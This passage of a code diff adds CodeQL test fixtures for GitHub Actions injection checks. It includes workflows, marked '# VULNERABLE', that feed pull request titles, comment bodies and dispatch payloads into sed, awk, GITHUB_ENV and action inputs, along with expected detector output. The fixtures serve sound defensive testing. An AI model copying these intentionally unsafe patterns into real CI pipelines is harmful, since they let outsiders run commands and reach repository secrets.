--raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | +subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref new file mode 100644 index 000000000000..fc6a3a80c984 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvVarInjectionMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml b/actions/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml new file mode 100644 index 000000000000..d87c3cad0068 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml @@ -0,0 +1,196 @@ +name: "Run Dagger pipeline" +description: "Runs a given dagger pipeline" +inputs: + subcommand: + description: "Subcommand for airbyte-ci" + required: true + context: + description: "CI context (e.g., pull_request, manual)" + required: true + github_token: + description: "GitHub token" + required: false + dagger_cloud_token: + description: "Dagger Cloud token" + required: false + docker_hub_username: + description: "Dockerhub username" + required: false + docker_hub_password: + description: "Dockerhub password" + required: false + options: + description: "Options for the subcommand" + required: false + production: + description: "Whether to run in production mode" + required: false + default: "True" + report_bucket_name: + description: "Bucket name for CI reports" + required: false + default: "airbyte-ci-reports-multi" + gcp_gsm_credentials: + description: "GCP credentials for GCP Secret Manager" + required: false + default: "" + gcp_integration_tester_credentials: + description: "GCP credentials for integration tests" + required: false + default: "" + git_repo_url: + description: "Git repository URL" + default: https://github.com/airbytehq/airbyte.git + required: false + git_branch: + description: "Git branch to checkout" + required: false + git_revision: + description: "Git revision to checkout" + required: false + slack_webhook_url: + description: "Slack webhook URL" + required: false + metadata_service_gcs_credentials: + description: "GCP credentials for metadata service" + required: false + metadata_service_bucket_name: + description: "Bucket name for metadata service" + required: false + default: "prod-airbyte-cloud-connector-metadata-service" + sentry_dsn: + description: "Sentry DSN" + required: false + spec_cache_bucket_name: + description: "Bucket name for GCS spec cache" + required: false + default: "io-airbyte-cloud-spec-cache" + spec_cache_gcs_credentials: + description: "GCP credentials for GCS spec cache" + required: false + gcs_credentials: + description: "GCP credentials for GCS" + required: false + ci_job_key: + description: "CI job key" + required: false + s3_build_cache_access_key_id: + description: "Gradle S3 Build Cache AWS access key ID" + required: false + s3_build_cache_secret_key: + description: "Gradle S3 Build Cache AWS secret key" + required: false + airbyte_ci_binary_url: + description: "URL to airbyte-ci binary" + required: false + default: https://connectors.airbyte.com/airbyte-ci/releases/ubuntu/latest/airbyte-ci + python_registry_token: + description: "Python registry API token to publish python package" + required: false + is_fork: + description: "Whether the PR is from a fork" + required: false + default: "false" + max_attempts: + description: "Number of attempts at running the airbyte-ci command" + required: false + default: 1 + retry_wait_seconds: + description: "Number of seconds to wait between retry attempts" + required: false + default: 60 + +runs: + using: "composite" + steps: + - name: Get start timestamp + id: get-start-timestamp + shell: bash + run: echo "start-timestamp=$(date +%s)" >> $GITHUB_OUTPUT + - name: Docker login + id: docker-login + uses: docker/login-action@v3 + if: ${{ inputs.docker_hub_username != '' && inputs.docker_hub_password != '' }} + with: + username: ${{ inputs.docker_hub_username }} + password: ${{ inputs.docker_hub_password }} + - name: Install Airbyte CI + id: install-airbyte-ci + uses: ./.github/actions/install-airbyte-ci + with: + airbyte_ci_binary_url: ${{ inputs.airbyte_ci_binary_url }} + is_fork: ${{ inputs.is_fork }} + - name: Run airbyte-ci + id: run-airbyte-ci + uses: nick-fields/retry@v3 + env: + CI: "True" + CI_GIT_USER: ${{ github.repository_owner }} + CI_PIPELINE_START_TIMESTAMP: ${{ steps.get-start-timestamp.outputs.start-timestamp }} + PULL_REQUEST_NUMBER: ${{ github.event.pull_request.number }} + # Next environment variables are workflow inputs based and can be set with empty values if the inputs are not required and passed + CI_CONTEXT: "${{ inputs.context }}" + CI_GIT_BRANCH: ${{ inputs.git_branch || github.head_ref }} + CI_GIT_REPO_URL: ${{ inputs.git_repo_url }} + CI_GIT_REVISION: ${{ inputs.git_revision || github.sha }} + CI_GITHUB_ACCESS_TOKEN: ${{ inputs.github_token }} + CI_JOB_KEY: ${{ inputs.ci_job_key }} + CI_REPORT_BUCKET_NAME: ${{ inputs.report_bucket_name }} + DAGGER_CLOUD_TOKEN: "${{ inputs.dagger_cloud_token }}" + DOCKER_HUB_PASSWORD: ${{ inputs.docker_hub_password }} + DOCKER_HUB_USERNAME: ${{ inputs.docker_hub_username }} + GCP_GSM_CREDENTIALS: ${{ inputs.gcp_gsm_credentials }} + GCP_INTEGRATION_TESTER_CREDENTIALS: ${{ inputs.gcp_integration_tester_credentials }} + GCS_CREDENTIALS: ${{ inputs.gcs_credentials }} + METADATA_SERVICE_BUCKET_NAME: ${{ inputs.metadata_service_bucket_name }} + METADATA_SERVICE_GCS_CREDENTIALS: ${{ inputs.metadata_service_gcs_credentials }} + PRODUCTION: ${{ inputs.production }} + PYTHON_REGISTRY_TOKEN: ${{ inputs.python_registry_token }} + PYTHON_REGISTRY_URL: ${{ inputs.python_registry_url }} + S3_BUILD_CACHE_ACCESS_KEY_ID: ${{ inputs.s3_build_cache_access_key_id }} + S3_BUILD_CACHE_SECRET_KEY: ${{ inputs.s3_build_cache_secret_key }} + SENTRY_DSN: ${{ inputs.sentry_dsn }} + SLACK_WEBHOOK: ${{ inputs.slack_webhook_url }} + SPEC_CACHE_BUCKET_NAME: ${{ inputs.spec_cache_bucket_name }} + SPEC_CACHE_GCS_CREDENTIALS: ${{ inputs.spec_cache_gcs_credentials }} + with: + shell: bash + max_attempts: ${{ inputs.max_attempts }} + retry_wait_seconds: ${{ inputs.retry_wait_seconds }} + # 360mn > 6 hours: it's the GitHub runner max job duration + timeout_minutes: 360 + command: | + airbyte-ci --disable-update-check --disable-dagger-run --is-ci --gha-workflow-run-id=${{ github.run_id }} ${{ inputs.subcommand }} ${{ inputs.options }} + - name: Stop Engine + id: stop-engine + if: always() + shell: bash + run: | + mapfile -t containers < <(docker ps --filter name="dagger-engine-*" -q) + if [[ "${#containers[@]}" -gt 0 ]]; then + # give 5mn to the Dagger Engine to push cache data to Dagger Cloud + docker stop -t 300 "${containers[@]}"; + fi + + - name: Collect dagger engine logs + id: collect-dagger-engine-logs + if: always() + uses: jwalton/gh-docker-logs@v2 + with: + dest: "./dagger_engine_logs" + images: "registry.dagger.io/engine" + + - name: Tar logs + id: tar-logs + if: always() + shell: bash + run: tar cvzf ./dagger_engine_logs.tgz ./dagger_engine_logs + + - name: Upload logs to GitHub + id: upload-dagger-engine-logs + if: always() + uses: actions/upload-artifact@v4 + with: + name: ${{ github.job }}_dagger_engine_logs.tgz + path: ./dagger_engine_logs.tgz + retention-days: 7 diff --git a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml new file mode 100644 index 000000000000..4b6888449c00 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml @@ -0,0 +1,9 @@ +on: issue_comment + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: ruby/setup-ruby@v2 + with: + ruby-version: ${{ github.event.comment.body }} diff --git a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml new file mode 100644 index 000000000000..db04b69ac168 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml @@ -0,0 +1,87 @@ +name: Documentation + +on: + workflow_dispatch: + pull_request: + +jobs: + parse_commit_info: + runs-on: ubuntu-latest + outputs: + can_deploy: ${{ steps.decide.outputs.can_deploy }} + deploy_to: ${{ steps.decide.outputs.deploy_to }} + + steps: + - name: Checkout Code + uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Copy build utils + run: | + cp -r .github/utils ../utils + + - name: Decide Whether to Build and/or Release + id: decide + run: | + set -xe + CAN_DEPLOY=$(python ../utils/please.py can_i_deploy_documentation) + DEPLOY_TO=$(python ../utils/please.py where_can_i_deploy_documentation) + + echo "can_deploy=$CAN_DEPLOY" >> $GITHUB_OUTPUT + echo "deploy_to=$DEPLOY_TO" >> $GITHUB_OUTPUT + echo github.ref ${{ github.ref }} + + build-documentation: + runs-on: ubuntu-latest + needs: parse_commit_info + + strategy: + matrix: + python-version: [3.11] + + steps: + - name: Checkout Code + uses: actions/checkout@v4 + + - name: Setup Python + uses: actions/setup-python@v5 + with: + python-version: ${{ matrix.python-version }} + + - name: Install Quarto + uses: quarto-dev/quarto-actions/setup@v2 + with: + version: pre-release + + - name: Install Package + shell: bash + run: | + make doc-deps + + - name: Environment Information + shell: bash + run: | + ls -la + ls -la doc + pip list + + - name: Build docs + shell: bash + run: | + pushd doc; make doc; popd + + - name: Environment Information + shell: bash + run: | + ls -la doc + cat doc/_variables.yml + ls -la doc/reference + + - name: Deploy to Documentation to a Branch + uses: JamesIves/github-pages-deploy-action@v4 + if: contains(needs.parse_commit_info.outputs.can_deploy, 'true') + with: + folder: doc/_site + branch: ${{ needs.parse_commit_info.outputs.deploy_to }} + commit-message: ${{ github.event.head_commit.message }} diff --git a/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml new file mode 100644 index 000000000000..6a449e24cf02 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml @@ -0,0 +1,63 @@ +name: Finalize connector rollout + +on: + repository_dispatch: + types: [finalize-connector-rollout] + workflow_dispatch: + inputs: + connector_name: + description: "Connector name" + required: true + action: + description: "Action to perform" + required: true + options: ["promote", "rollback"] +jobs: + finalize_rollout: + name: Finalize connector rollout + runs-on: connector-publish-large + env: + ACTION: ${{ github.event_name == 'workflow_dispatch' && github.event.inputs.action || github.event.client_payload.action }} + steps: + - name: Check action value + run: | + if [[ "${ACTION}" != "promote" && "${ACTION}" != "rollback" ]]; then + echo "Invalid action: ${ACTION}" + exit 1 + fi + shell: bash + - name: Checkout Airbyte + uses: actions/checkout@v4 + - name: Promote {{ github.event.client_payload.connector_name }} release candidate + id: promote-release-candidate + if: ${{ env.ACTION == 'promote' }} + uses: ./.github/actions/run-airbyte-ci + with: + context: "manual" + dagger_cloud_token: ${{ secrets.DAGGER_CLOUD_TOKEN_2 }} + docker_hub_password: ${{ secrets.DOCKER_HUB_PASSWORD }} + docker_hub_username: ${{ secrets.DOCKER_HUB_USERNAME }} + gcp_gsm_credentials: ${{ secrets.GCP_GSM_CREDENTIALS }} + gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + github_token: ${{ secrets.GITHUB_TOKEN }} + metadata_service_gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + sentry_dsn: ${{ secrets.SENTRY_AIRBYTE_CI_DSN }} + slack_webhook_url: ${{ secrets.PUBLISH_ON_MERGE_SLACK_WEBHOOK }} + subcommand: "connectors --name=${{ github.event.client_payload.connector_name }} publish --promote-release-candidate" + - name: Rollback {{ github.event.client_payload.connector_name }} release candidate + id: rollback-release-candidate + if: ${{ env.ACTION == 'rollback' }} + uses: ./.github/actions/run-airbyte-ci + with: + context: "manual" + dagger_cloud_token: ${{ secrets.DAGGER_CLOUD_TOKEN_2 }} + docker_hub_password: ${{ secrets.DOCKER_HUB_PASSWORD }} + docker_hub_username: ${{ secrets.DOCKER_HUB_USERNAME }} + gcp_gsm_credentials: ${{ secrets.GCP_GSM_CREDENTIALS }} + gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + github_token: ${{ secrets.GITHUB_TOKEN }} + metadata_service_gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + sentry_dsn: ${{ secrets.SENTRY_AIRBYTE_CI_DSN }} + slack_webhook_url: ${{ secrets.PUBLISH_ON_MERGE_SLACK_WEBHOOK }} + spec_cache_gcs_credentials: ${{ secrets.SPEC_CACHE_SERVICE_ACCOUNT_KEY_PUBLISH }} + subcommand: "connectors --name=${{ github.event.client_payload.connector_name }} publish --rollback-release-candidate" diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected new file mode 100644 index 000000000000..281fd39552a7 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref new file mode 100644 index 000000000000..0cdb9a399a84 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-078/CommandInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected new file mode 100644 index 000000000000..99ebb1edc05d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -0,0 +1,5 @@ +edges +nodes +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref new file mode 100644 index 000000000000..8e1bab538bbf --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-078/CommandInjectionMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml new file mode 100644 index 000000000000..5d841e50dbb4 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -0,0 +1,74 @@ +name: Argument injection + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + env: + TITLE: ${{github.event.pull_request.title}} + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: | + # NOT VULNERABLE + echo "s/FOO/$TITLE/g" + - run: | + # VULNERABLE + sed "s/FOO/$TITLE/g" + - run: | + # VULNERABLE + echo "foo" | sed "s/FOO/$TITLE/g" > bar + - run: | + # VULNERABLE + echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) + - run: | + # VULNERABLE + awk "BEGIN {$TITLE}" + - run: | + # VULNERABLE + sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json + - run: | + # VULNERABLE + sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json + - run: | + # VULNERABLE + sed -e 's##${TITLE}#' \ + -e 's##${{ env.sot_repo }}#' \ + -e 's##TITLE#' \ + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + - run: | + # VULNERABLE + sed -e 's##TITLE#' \ + -e 's##${{ env.sot_repo }}#' \ + -e 's##${TITLE}#' \ + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + - run: | + # VULNERABLE + BODY=$(git log --format=%s) + sed "s/FOO/$BODY/g" > /tmp/foo + - run: | + # VULNERABLE + BODY=$(git diff --name-only HEAD) + sed "s/FOO/$BODY/g" > /tmp/foo + - run: | + # VULNERABLE + BODY=$(git diff --name-only HEAD ) + sed "s/FOO/$BODY/g" > /tmp/foo + - run: | + # VULNERABLE + BODY=$(git diff --name-only HEAD^ | xargs) + sed "s/FOO/$BODY/g" > /tmp/foo + - run: | + # NOT VULNERABLE + echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT + - run: | + # NOT VULNERABLE + git log -1 --pretty=%s + - run: | + # NOT VULNERABLE + BODY=$(git log --format=%s) + sed -E 's/\s+/\n/g' <<<"$BODY" diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected new file mode 100644 index 000000000000..5eddb791ae5c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected @@ -0,0 +1,35 @@ +edges +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +nodes +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | semmle.label | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | semmle.label | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | semmle.label | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | semmle.label | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | semmle.label | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +subpaths +#select +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | 